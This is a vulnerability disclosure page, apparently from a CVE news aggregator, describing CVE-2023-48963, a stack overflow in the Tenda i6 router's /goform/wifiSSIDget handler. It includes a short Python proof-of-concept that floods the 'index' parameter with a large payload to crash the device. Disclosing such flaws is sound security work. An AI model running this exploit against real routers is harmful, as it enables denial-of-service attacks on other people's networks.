Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-48963: GitHub - daodaoshao/vul_tenda_i6_1

Tenda i6 V1.0.0.8(3856) is vulnerable to Buffer Overflow via /goform/wifiSSIDget.

CVE
#vulnerability#git#buffer_overflow#wifi

Tenda APi6 V1.0.0.8(3856) Stack Overflow****Firmware information

Manufacturer’s address:https://www.tenda.com.cn/

Firmware download address: https://www.tenda.com.cn/download/detail-2570.html

Affected Version****Vulnerability Details

Vulnerability Location: /goform/wifiSSIDget

The length of the ndex parameter is not verified, sprintf can cause stack overflow vulnerability, it can result in dos attacks on routers

The pages of the router

POC

import requests from pwn import*

ip = “192.168.182.21” url = “http://” + ip + “/goform/wifiSSIDget” print(url)

payload =b’a’*0x3000

cookie = {"Cookie":"user="} data = {"index": payload,"wl_radio":0} response = requests.post(url, cookies=cookie, data=data) print(response.text) print(“HackAttackSuccess!”)

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907